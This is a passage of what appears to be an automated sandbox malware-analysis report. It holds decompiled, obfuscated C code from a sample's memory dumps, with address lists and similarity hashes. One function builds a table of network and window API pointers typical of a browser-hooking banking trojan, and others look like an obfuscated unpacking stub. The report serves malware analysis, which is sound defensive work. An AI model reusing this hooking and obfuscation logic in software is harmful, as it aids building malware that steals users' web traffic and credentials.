				if(_t1 == 0) {
					_t1 =  *0x41e5b0;
					 *0x41e024 = E0040E904;
				} else {
					 *0x41e024 = E0040E9BB;
				}
				 *0x41e020 = _t1;
				_t2 =  *0x41e5c0; // 0x77e27840
				 *0x41e030 = _t2;
				 *0x41e040 = GetFileAttributesExW;
				 *0x41e050 = HttpSendRequestW;
				 *0x41e060 = HttpSendRequestA;
				 *0x41e070 = HttpSendRequestExW;
				 *0x41e080 = HttpSendRequestExA;
				 *0x41e090 = InternetCloseHandle;
				 *0x41e0a0 = InternetReadFile;
				 *0x41e0b0 = __imp__InternetReadFileExA;
				 *0x41e0c0 = InternetQueryDataAvailable;
				 *0x41e0d0 = HttpQueryInfoA;
				 *0x41e0e0 = __imp__#3;
				 *0x41e0f0 = __imp__#19;
				 *0x41e100 = __imp__WSASend;
				 *0x41e110 = OpenInputDesktop;
				 *0x41e120 = SwitchDesktop;
				 *0x41e130 = DefWindowProcW;
				 *0x41e140 = DefWindowProcA;
				 *0x41e150 = DefDlgProcW;
				 *0x41e160 = DefDlgProcA;
				 *0x41e170 = DefFrameProcW;
				 *0x41e180 = DefFrameProcA;
				 *0x41e190 = DefMDIChildProcW;
				 *0x41e1a0 = DefMDIChildProcA;
				 *0x41e1b0 = CallWindowProcW;
				 *0x41e1c0 = CallWindowProcA;
				 *0x41e1d0 = RegisterClassW;
				 *0x41e1e0 = RegisterClassA;
				 *0x41e1f0 = RegisterClassExW;
				 *0x41e200 = RegisterClassExA;
				 *0x41e210 = BeginPaint;
				 *0x41e220 = EndPaint;
				 *0x41e230 = GetDCEx;
				 *0x41e240 = GetDC;
				 *0x41e250 = GetWindowDC;
				 *0x41e260 = ReleaseDC;
				 *0x41e270 = GetUpdateRect;
				 *0x41e280 = GetUpdateRgn;
				 *0x41e290 = GetMessagePos;
				 *0x41e2a0 = GetCursorPos;
				 *0x41e2b0 = SetCursorPos;
				 *0x41e2c0 = SetCapture;
				 *0x41e2d0 = ReleaseCapture;
				 *0x41e2e0 = GetCapture;
				 *0x41e2f0 = GetMessageW;
				 *0x41e300 = GetMessageA;
				 *0x41e310 = PeekMessageW;
				_push(0x41e020);
				 *0x41e320 = PeekMessageA;
				_t53 = 0x32;
				 *0x41e330 = __imp__PFXImportCertStore;
				return E0040ECE3(_t53, _t55, _t56);
			}

0x0040ed74
0x0040ed7b
0x0040ed89
0x0040ed8e
0x0040ed7d
0x0040ed7d
0x0040ed7d
0x0040ed98
0x0040ed9d
0x0040eda2
0x0040edac
0x0040edb6
0x0040edc0
0x0040edca
0x0040edd4
0x0040edde
0x0040ede8
0x0040edf2
0x0040edfc
0x0040ee06
0x0040ee10
0x0040ee1a
0x0040ee24
0x0040ee2e
0x0040ee38
0x0040ee42
0x0040ee4c
0x0040ee56
0x0040ee60
0x0040ee6a
0x0040ee74
0x0040ee7e
0x0040ee88
0x0040ee92
0x0040ee9c
0x0040eea6
0x0040eeb0
0x0040eeba
0x0040eec4
0x0040eece
0x0040eed8
0x0040eee2
0x0040eeec
0x0040eef6
0x0040ef00
0x0040ef0a
0x0040ef14
0x0040ef1e
0x0040ef29
0x0040ef33
0x0040ef3d
0x0040ef47
0x0040ef51
0x0040ef5b
0x0040ef65
0x0040ef6f
0x0040ef79
0x0040ef7e
0x0040ef8a
0x0040ef8b
0x0040ef96

Strings

@xw, xrefs: 0040ED9D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: @xw
API String ID: 4275171209-2821512424
Opcode ID: 8cd4c89e1d4a7062916963e9c196d80a2e1ebd930319657cea5a3a70e9770776
Instruction ID: 640cc757fa93cb85b2af48e3c922d0b76feae3825dd99dd490422aec469a6a36
Opcode Fuzzy Hash: 8cd4c89e1d4a7062916963e9c196d80a2e1ebd930319657cea5a3a70e9770776
Instruction Fuzzy Hash: CB61BCBCA00215DFE380CF6AEA90A807BE5B30D7443448A7AED58E3771E374A8459B0D

Uniqueness

Uniqueness Score: -1.00%

Function 0245B0E3, Relevance: 1.3, Strings: 1, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0245B0E3(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _t42;
				signed int _t45;
				signed int _t59;
				signed int _t61;
				intOrPtr* _t80;

				_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a32 + 0x190))));
				asm("adc ebx, eax");
				_v16 = _a8 ^ 0x15692923;
				if((_a4 ^ 0xf26341d4) + 0x24398beb != _a20 || _v16 != 0) {
					asm("adc ebx, eax");
					_v16 = _a8 ^ 0x15692923;
					if( *_a24 != (_a4 ^ 0xf26341d4) + 0x24398beb || 0 != _v16) {
						_t80 = _a24;
						_t42 = E0245AC60( *_t80, _v8, _a28, _a32);
						 *_t80 = _t42;
						return _t42;
					} else {
						asm("adc ebx, eax");
						_v24 = _a8 ^ 0x15692923;
						_v20 = _a12;
						_v20 = _v20 ^ 0xf26341d4;
						_v16 = _a16;
						_v16 = _v16 ^ 0x15692923;
						_a12 = _v20 + 0x24398beb;
						_t59 = _v16;
						asm("adc ebx, eax");
						_a16 = _t59;
						if((_a4 ^ 0xf26341d4) + 0x24398beb != _a12 || _v24 != _t59) {
							_t61 = _a8 ^ 0x15692923;
							asm("adc ebx, eax");
							if(_v8 != (_a4 ^ 0xf26341d4) + 0x24398beb || 0 != _t61) {
								 *0xdf065d8e =  *0xdf065d8e + 0x5e60548e;
								return 0;
							} else {
								 *0xa4201ae =  *0xa4201ae & 0x6b60138f;
								return 0;
							}
						} else {
							_t45 =  *0x4e604cae * 0xae70035f;
							 *0x4e604cae = _t45;
							return _t45;
						}
					}
				} else {
					 *0xda53738f =  *0xda53738f | 0x1b6212be;
					return 0x2568237a;
				}
			}

0x0245b110
0x0245b11a
0x0245b11c
0x0245b124
0x0245b148
0x0245b14a
0x0245b154
0x0245b160
0x0245b16b
0x0245b170
0x00000000
0x0245b177
0x0245b183
0x0245b185
0x0245b18b
0x0245b191
0x0245b194
0x0245b197
0x0245b19f
0x0245b1a2
0x0245b1a5
0x0245b1a7
0x0245b1ad
0x0245b1d0
0x0245b1d4
0x0245b1db
0x0245b1e1
0x00000000
0x0245b1ed
0x0245b1ed
0x00000000
0x0245b1ed
0x0245b1b6
0x0245b1bb
0x0245b1c1
0x00000000
0x0245b1c1
0x0245b1ad
0x0245b12d
0x0245b12d
0x00000000
0x0245b12d

Strings

z#h%, xrefs: 0245B115

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: z#h%
API String ID: 0-4193079989
Opcode ID: fb0d810867c324c2d9e8b002b858946fdb03724e809642219420884dff85fbea
Instruction ID: 09ae7fa8b0c5bf500fc1d78cdc3a078b5fbebad46e0f0ee43e2b6311e67bc3b0
Opcode Fuzzy Hash: fb0d810867c324c2d9e8b002b858946fdb03724e809642219420884dff85fbea
Instruction Fuzzy Hash: 31415276A00329DFCB41CF99C8C05AEB7B2FF88298B55806AD954A7301D770A951CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024413C7, Relevance: .5, Instructions: 492
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E024413C7(signed int __ecx, void* __edx) {
				signed int _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				short _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed short* _v52;
				intOrPtr* _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr* _t173;
				signed int* _t180;
				signed int _t182;
				signed int _t185;
				signed int _t206;
				intOrPtr _t218;
				signed int _t225;
				signed int _t240;
				void* _t243;
				signed int _t264;
				intOrPtr _t281;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t309;
				signed int _t333;
				intOrPtr _t336;
				intOrPtr _t349;
				signed int _t361;
				void* _t364;
				void* _t375;
				signed int _t378;
				intOrPtr _t383;
				signed int _t394;
				signed int _t397;
				signed int _t399;
				intOrPtr _t400;
				signed int _t404;
				signed int _t406;
				intOrPtr* _t407;
				signed int _t411;

				_t169 =  *0x24491a0; // 0x2449028
				_t1 = _t169 + 0x198; // 0x2449428
				 *0x2449851 =  *0x2449851 | 0x02449845;
				 *( *_t1) =  *( *_t1) & 0x00000000;
				_t172 =  *0x24491a0; // 0x2449028
				 *0x2449749 =  *0x2449749 + 0x2449791;
				_t2 = _t172 + 0x198; // 0x2449428
				_t173 =  *_t2;
				 *0x244980d = 0x1e9e;
				if( *_t173 != 0) {
					return _t173;
				} else {
					_v28 = 0xc6f8e435;
					_v68 = 0xc6f8e409;
					_v48 =  &_v44;
					asm("adc dword [0x24497c1], 0x6982");
					 *0x24497b9 =  !( *0x24497b9);
					_v72 =  &_v40;
					_v60 =  &_v36;
					_v7 = 0xfc;
					 *0x24497c1 =  ~( *0x24497c1);
					_v9 = 0xdc;
					_t229 = __ecx &  *0x2449745;
					_t406 = 0x26ceac77;
					_push(_t178);
					while(1) {
						L2:
						_v24 = 0x1000;
						do {
							L3:
							asm("sbb [0x24497cd], edx");
							_v40 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
							 *_v48 = 0xc6f9e435;
							 *0x2449801 =  *0x2449801 - 0x5020;
							 *0x244974d =  *0x244974d ^ 0x02449861;
							asm("sbb edx, [0x2449849]");
							 *0x2449751 =  *0x2449751 & 0x000000ff;
							_v44 = ( *_v48 ^ 0x2a823c2b) + 0x138527e2;
							_v32 = 0;
							_t180 =  *0x2449881; // 0x2449855
							 *0x2449741 =  *0x2449741 &  *_t180;
							_t240 =  *_v72;
							_t182 =  *0x2449795; // 0xff4dd7d5
							 *0x2449785 =  *0x2449785 & _t182;
							_v64 = _t240;
							 *0x2449851 =  *0x2449851 - _t240;
							 *0x2449861 =  *0x2449861 ^ _t182;
							_v84 = 0xc6f8e434;
							_t178 = _v44;
							 *0x2449815 =  *0x2449815 ^ 0x024497bd;
							_t243 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
							_t375 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
							 *0x2449809 = 0x36f6;
							 *0x244973d = 0x920;
							if(_t243 >= _t178) {
								L10:
								_v32 = 0xc6f8e405;
								 *0x2449755 = 0x742a;
								while(1) {
									 *0x2449859 =  *0x2449859 - 0x2449779;
									 *0x24497d1 =  *0x24497d1 ^ 0x00006830;
									 *0x2449851 = 0x77fe;
									if((_v32 ^ 0x2a823c2b) + 0x138527e2 == 0) {
										break;
									}
									asm("adc dword [0x244984d], 0x44c1");
									 *0x2449739 =  *0x2449739 ^ 0x00001b88;
									 *0x2449861 =  *0x2449861 - 0x2449859;
									_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
									 *0x2449795 =  *0x2449795 | _t406;
									_v64 = 0xc6f8e40c;
									_v80 = 0xc6f8e40e;
									_v84 = 0xc6f8e409;
									_t378 =  *0x24497f9; // 0x8b744035
									 *0x2449815 =  *0x2449815 & _t378;
									 *0x2449809 =  *0x2449809 & 0x00004e71;
									 *0x2449841 = 0x3472;
									if(_v20 != (_v64 ^ 0x2a823c2b) + 0x138527e2) {
										asm("adc ecx, [0x244973d]");
										 *0x2449809 =  *0x2449809 - 0x6779;
										 *0x24497cd = 0x77eb;
										 *0x244980d = 0x1c28;
										if(_v20 != (_v80 ^ 0x2a823c2b) + 0x138527e2) {
											asm("sbb edx, edx");
											 *0x24497d5 =  *0x24497d5 + _t178;
											 *0x2449801 = 0x7223;
											 *0x24497f9 =  *0x24497f9 ^ 0x00002bac;
											 *0x24497d5 = 0x4f;
											if(_v20 == (_v84 ^ 0x2a823c2b) + 0x138527e2) {
												asm("adc ecx, 0x7518");
												_t264 =  *0x2449795; // 0xff4dd7d5
												asm("adc ecx, [0x2449749]");
												 *0x2449795 = _t264;
												 *0x2449851 = 0x6e1c;
												_v16 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
											}
										} else {
											_v52 = _v36;
										}
									} else {
										 *0x2449789 = _t178;
										 *_v60 = _v76;
									}
									 *0x24497c5 =  *0x24497c5 - 0x24497bd;
									_v32 = (_v32 ^ 0x2a823c2b) - 0x00000001 ^ 0x2a823c2b;
								}
								 *0x2449859 = 0x5a3;
								while(1) {
									 *0x24497d1 = 0x2828;
									 *0x2449749 = 0x171d;
									 *0x2449779 = 0x6fba;
									if(_v16 == 0x3bfa) {
										goto L22;
									}
									_t185 =  *0x244974d; // 0x4bed
									 *0x2449739 =  *0x2449739 | _t185;
									asm("sbb dword [0x2449749], 0x3611");
									 *0x2449801 =  *0x2449801 - 0x5d27;
									 *_v60 = _v36 -  *_v48;
									 *0x244983d =  *0x244983d & 0x00006bb7;
									_v52 = _v36;
									_t178 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
									 *0x2449749 = 0x3e12;
									_v16 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
								}
								goto L22;
							}
							asm("adc ebx, 0x2948");
							_t404 = _t375 - 1;
							do {
								asm("sbb dword [0x2449805], 0x2449749");
								 *0x24497c1 =  !( *0x24497c1);
								 *0x24497d5 = 0x7fcc;
								_t404 = _t404 + 1;
								 *0x244974d = 0x406;
								if(_t243 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
									_t407 =  *0x2449270; // 0x2449018
									_t225 =  *0x2449755; // 0x1f9a
									 *0x2449791 =  *0x2449791 ^ _t225;
									 *0x2449841 =  *0x2449841 - 0x24497bd;
									_t406 = 0x26ceac77;
									_v32 = _v64 +  *((intOrPtr*)( *_t407));
								}
								if(_t243 == _t404) {
									 *0x2449851 =  *0x2449851 | 0x0244977d;
									_t411 =  !_t404 &  *_v32;
									_v76 = _t411;
									 *0x2449845 = _t411;
									_t406 = 0x26ceac77;
								}
								 *0x2449801 = 0x7fee;
								_t178 = _v44;
								_t243 = _t243 + 1;
								 *0x24497f9 = 0x2307;
							} while (_t243 < _t178);
							goto L10;
							L22:
							_t229 = _v24;
							_v36 = _v36 + _t229;
							 *0x24497b9 = 0x2449795 +  *0x24497b9;
							_v24 = _v24 - 1;
							 *0x244974d = 0x28e3;
						} while (_v24 >= 1);
						 *0x2449741 =  *0x2449741 - _t229;
						_v36 = _v36 - 1;
						asm("sbb edx, edx");
						_t383 =  *0x24491a0; // 0x2449028
						asm("sbb dword [0x24497c1], 0x40bb");
						_t71 = _t383 + 0x198; // 0x2449428
						 *((intOrPtr*)( *_t71)) = _v36;
						_v32 = 0xc6f8e435;
						asm("sbb ecx, [0x2449805]");
						 *0x2449861 = ( *0x2449861 & 0x000000ff) -  *0x244978d;
						_v32 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
						_t281 =  *0x24491a0; // 0x2449028
						_t75 = _t281 + 0x198; // 0x2449428
						 *0x2449851 =  *0x2449851 & 0x000000ff |  *0x244973d;
						_t76 = _t281 + 0x198; // 0x2449428
						 *0x2449801 =  *0x2449801 & 0x000000ff &  *0x2449811;
						asm("sbb [0x24497c5], ebx");
						_t178 = _v32;
						asm("sbb dword [0x24497d1], 0x2449785");
						 *0x2449841 =  *0x2449841 & 0x02449795;
						asm("adc edx, 0x5649");
						_v32 =  *((intOrPtr*)( *((intOrPtr*)( *_t76)) + 0x78 + _v32 * 8 +  *((intOrPtr*)( *((intOrPtr*)( *_t75)) + 0x3c))));
						 *0x2449781 =  *0x2449781 - 1;
						 *0x2449795 = 0x6f09;
						_t289 =  *0x24491a0; // 0x2449028
						_t86 = _t289 + 0x198; // 0x2449428
						_t229 =  *_t86;
						 *0x244984d = 0x37b0;
						if(_v32 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
							 *_t229 =  *_t229 & 0x00000000;
							while(1) {
								L2:
								_v24 = 0x1000;
								goto L3;
							}
						}
						 *0x24497f9 =  *0x24497f9 | 0x024497bd;
						_t290 =  *0x24491a0; // 0x2449028
						_t88 = _t290 + 0x198; // 0x2449428
						asm("adc [0x2449741], ebx");
						_v32 = _v32 +  *_t229;
						_t394 = 0;
						_v6 = 0;
						 *0x2449801 =  *0x2449801 + _t406;
						asm("sbb dword [0x2449755], 0x2449809");
						 *0x2449785 =  *0x2449785 ^ 0x00002ae2;
						_v8 =  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0xc)) +  *((intOrPtr*)( *_t88))));
						asm("sbb [0x2449839], ebx");
						 *0x24497d5 = 0x7ba0;
						if(_v32 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
							L31:
							_v24 = 0x4e402d8e;
							_v5 = _t394;
							_v64 = _t394;
							_v32 = 0xc6f8e445;
							_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
							while(0 != 0) {
								_v24 = ((_v20 - 0x138527e2 ^ 0x2a823c2b) - _t406 ^ _v32) * _v24;
								_v5 = _v6;
								_t309 = _v20;
								_t206 = _v32;
								if(_v24 <= 0xdf317079) {
									_v24 = ((_t309 - 0x138527e2 ^ 0x2a823c2b) - _t406 & _t206) + _v24;
								} else {
									_v24 = _v24 - ((_t309 - 0x138527e2 ^ 0x2a823c2b) - _t406 | _t206);
								}
								_v5 = (_v5 & 0x000000ff) - 0x00003f01 ^ 0x000020b6;
								if(_v5 != _v7) {
									_v64 = 1;
								}
								_v20 = _v20 - 1;
							}
							if(_v64 == 0) {
								L54:
								return 0x2a823c2b;
							}
							_v6 = _t394;
							_v64 = 1;
							if((_v8 - 0x00003f01 & 0x0000ffff ^ 0x000020b6) != _v9) {
								_v64 = _t394;
							}
							if(_v64 == 0) {
								_t333 = _v68;
								if(_v40 >= (_v28 ^ 0x2a823c2b) + 0x138527e2) {
									_t178 = _v40;
									_v40 = (_t333 ^ 0x2a823c2b) + _v40 + 0x138527e2;
								} else {
									_t178 = 0xec7ad81e - (_t333 ^ 0x2a823c2b) + _v40;
									_v40 = 0xec7ad81e;
								}
								_t336 =  *0x24491a0; // 0x2449028
								_t150 = _t336 + 0x198; // 0x2449428
								 *((intOrPtr*)( *_t150)) = _t394;
								_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
								while(_v20 != 0) {
									_v24 = ((_v20 - 0x138527e2 ^ 0x2a823c2b) - _t406 ^ _v32) * _v24;
									_t349 = _v20;
									_t397 = _v32;
									if(_v24 <= 0xdf317079) {
										_v24 = ((_t349 - 0x138527e2 ^ 0x2a823c2b) - _t406 & _t397) + _v24;
									} else {
										_v24 = _v24 - ((_t349 - 0x138527e2 ^ 0x2a823c2b) - _t406 | _t397);
									}
									_t229 = _v32 >> 1;
									if(_v20 == _v32 >> 1) {
										goto L2;
									} else {
										_v20 = _v20 - 1;
										continue;
									}
								}
							}
							goto L54;
						}
						_t399 =  *0x2449791; // 0xff20b1f2
						 *0x2449795 =  *0x2449795 ^ _t399;
						_t361 = _v32;
						asm("adc [0x2449815], edi");
						_t400 =  *((intOrPtr*)(_t361 + 0xc));
						 *0x24497c1 =  *0x24497c1 & _t361;
						 *0x2449849 =  *0x2449849 & 0x00003abb;
						_t364 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
						 *0x2449795 = 0x7215;
						while(1) {
							 *0x2449859 = 0x52d8;
							if(_t364 >= _t400) {
								break;
							}
							asm("sbb dword [0x244974d], 0x2449859");
							if(_t364 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
								_t218 =  *0x24491a0; // 0x2449028
								 *0x2449815 = 0x4dbe;
								_t101 = _t218 + 0x198; // 0x2449428
								 *0x244983d = 0x207f;
								_v56 =  *((intOrPtr*)( *_t101));
							}
							_v56 = _v56 + 1;
							 *0x24497fd = 0x3248;
							_t364 = _t364 + 1;
						}
						 *0x2449805 =  *0x2449805 - _t406;
						_v6 =  *_v56;
						_t394 = 0;
						goto L31;
					}
				}
			}

0x024413ca
0x024413cf
0x024413d5
0x024413df
0x024413e7
0x024413ec
0x024413f6
0x024413f6
0x02441402
0x0244140c
0x02441c57
0x02441412
0x02441412
0x02441419
0x02441424
0x02441427
0x02441434
0x0244143a
0x02441441
0x02441447
0x0244144b
0x02441451
0x0244145a
0x02441467
0x0244146c
0x0244146d
0x0244146d
0x0244146d
0x02441474
0x02441474
0x0244148b
0x02441491
0x02441497
0x0244149d
0x024414ae
0x024414c1
0x024414c7
0x024414cd
0x024414d0
0x024414da
0x024414e2
0x024414e8
0x024414ea
0x024414f0
0x024414f6
0x024414f9
0x02441502
0x02441508
0x02441512
0x02441515
0x02441523
0x02441525
0x02441527
0x02441533
0x0244153d
0x024415f2
0x024415f2
0x024415f9
0x02441764
0x02441767
0x02441773
0x0244177f
0x02441789
0x00000000
0x00000000
0x0244160d
0x02441619
0x02441625
0x0244162f
0x02441632
0x02441638
0x02441645
0x0244164c
0x02441656
0x0244165c
0x02441667
0x02441675
0x0244167f
0x02441698
0x024416a6
0x024416b2
0x024416be
0x024416c8
0x024416d9
0x024416de
0x024416e7
0x024416f3
0x02441701
0x0244170b
0x02441716
0x0244171f
0x02441725
0x0244172b
0x02441736
0x0244174b
0x0244174b
0x024416ce
0x024416d1
0x024416d1
0x02441685
0x02441685
0x02441691
0x02441691
0x02441752
0x02441761
0x02441761
0x02441796
0x0244181d
0x0244181d
0x0244182b
0x02441838
0x02441842
0x00000000
0x00000000
0x024417bb
0x024417c1
0x024417ca
0x024417d6
0x024417e3
0x024417e5
0x024417f8
0x02441809
0x0244180f
0x02441819
0x02441819
0x00000000
0x0244181d
0x02441543
0x02441549
0x0244154a
0x0244154d
0x02441559
0x02441561
0x0244156b
0x0244156c
0x02441578
0x0244157e
0x02441586
0x0244158c
0x02441595
0x024415a1
0x024415a6
0x024415a6
0x024415ab
0x024415b6
0x024415c2
0x024415c4
0x024415c7
0x024415cd
0x024415cd
0x024415d2
0x024415dc
0x024415df
0x024415e2
0x024415e2
0x00000000
0x02441848
0x02441848
0x0244184b
0x0244184e
0x02441858
0x0244185b
0x02441865
0x0244186f
0x02441875
0x02441878
0x0244187d
0x02441883
0x0244188d
0x02441893
0x02441895
0x0244189c
0x024418b8
0x024418be
0x024418c1
0x024418c7
0x024418da
0x024418e0
0x024418f3
0x02441901
0x02441907
0x0244190c
0x0244191d
0x0244192a
0x02441930
0x0244193b
0x02441943
0x0244194f
0x02441955
0x02441955
0x0244195b
0x02441965
0x02441c4b
0x0244146d
0x0244146d
0x0244146d
0x00000000
0x0244146d
0x0244146d
0x02441972
0x0244197c
0x02441982
0x0244198e
0x02441994
0x0244199d
0x024419a5
0x024419a8
0x024419b1
0x024419c0
0x024419cd
0x024419d0
0x024419e2
0x024419ec
0x02441a9e
0x02441a9e
0x02441aa5
0x02441aa8
0x02441aab
0x02441ab9
0x02441b3c
0x02441ad5
0x02441adb
0x02441ae7
0x02441aea
0x02441aed
0x02441b0e
0x02441af3
0x02441afb
0x02441afb
0x02441b21
0x02441b2c
0x02441b32
0x02441b32
0x02441b39
0x02441b39
0x02441b4a
0x02441c53
0x00000000
0x02441c55
0x02441b50
0x02441b53
0x02441b7a
0x02441b80
0x02441b80
0x02441b88
0x02441b9a
0x02441b9d
0x02441bb7
0x02441bc3
0x02441ba3
0x02441bac
0x02441baf
0x02441baf
0x02441bc6
0x02441bcc
0x02441bd2
0x02441bdb
0x02441bde
0x02441bfd
0x02441c09
0x02441c0c
0x02441c0f
0x02441c30
0x02441c15
0x02441c1d
0x02441c1d
0x02441c39
0x02441c3d
0x00000000
0x02441c43
0x02441c43
0x00000000
0x02441c43
0x02441c3d
0x02441bde
0x00000000
0x02441b88
0x024419f2
0x024419f8
0x024419fe
0x02441a01
0x02441a07
0x02441a0a
0x02441a13
0x02441a1f
0x02441a21
0x02441a7c
0x02441a7c
0x02441a88
0x00000000
0x00000000
0x02441a33
0x02441a43
0x02441a49
0x02441a4f
0x02441a59
0x02441a5f
0x02441a6b
0x02441a6b
0x02441a6e
0x02441a71
0x02441a7b
0x02441a7b
0x02441a8e
0x02441a99
0x02441a9c
0x00000000
0x02441a9c
0x0244146d

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc32532320c0c5f0377c12a090dee165773b7f94cd621ca716219ec65b1d615a
Instruction ID: 230f328b7ed7306ccd4df4d7ddeeebb11073eb3c2d24e94346e8ed64aee2fa72
Opcode Fuzzy Hash: cc32532320c0c5f0377c12a090dee165773b7f94cd621ca716219ec65b1d615a
Instruction Fuzzy Hash: 93326878E84615CFDB0CCFA9E4A49AFBBF2FB48314B14886EC40A67381DB351956DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0245AC60, Relevance: .4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0245AC60(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int* _v32;
				signed int* _v36;
				signed int* _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v72;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v108;
				void* __esi;
				intOrPtr _t223;
				signed int _t224;
				signed int _t251;
				intOrPtr _t269;
				signed int _t270;
				signed int _t470;
				void* _t471;

				_v8 = 0xc6f8e435;
				_v28 = 0xc6f8e434;
				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a16 + 0x190)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a16 + 0x190)))) + 0x3c));
				_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v48 =  *((intOrPtr*)(_v12 + 0x50)) - 0xc;
				_t223 = _v12;
				if(( *(_v12 + 0x54) &  *((intOrPtr*)(_v12 + 0x38)) - 0x00000001) == 0) {
					_t224 =  *((intOrPtr*)(_t223 + 0x54));
				} else {
					_t224 =  *((intOrPtr*)(_v12 + 0x38)) + ( *(_v12 + 0x54) &  !( *((intOrPtr*)(_t223 + 0x38)) - 1));
				}
				_a16 = _t224;
				_v40 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				 *_a12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v44 = 0xc6f8e434;
				_v44 = 0xc6f8e40b;
				_v44 = 0xc6f8e40a;
				_v44 = 0xc6f8e409;
				while(((_v28 ^ 0x2a823c2b) + 0x138527e2) * _a16 < (_v8 ^ 0x2a823c2b) + _v48 + 0x138527e2) {
					_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					_v24 = _a16 + _a8;
					_v20 = E02459F4A(_v12, _a8, _v24);
					_v44 = 0xc6f8e40d;
					E0245A4DE((_v44 ^ 0x2a823c2b) + 0x138527e2,  &_v72);
					if(_v20 == 0) {
						L7:
						E0245A3D4( &_v84, _v24, 0xc);
						_t251 = 0xc6f8e435;
						_v52 = 0xc6f8e435;
						_v56 = 0xc6f8e434;
						_v60 = 0xc6f8e40b;
						_v64 = 0xc6f8e40a;
						_v32 =  &_v52;
						_v36 =  &_v56;
						_v20 =  &_v60;
						_v40 =  &_v64;
						_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
						while(_v16 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							if(_t251 != 0xc6f8e40b) {
								_v16 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
								_t470 = _t251 ^ 0x2a823c2b;
								_v44 = _v44 + _t470 + 0x138527e2;
								if(_v44 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
									E0245A9BA( &_v84, 0xc, (_v8 ^ 0x2a823c2b) + 0x138527e2);
								}
								if(( *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 ||  *((intOrPtr*)(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v20 ^ 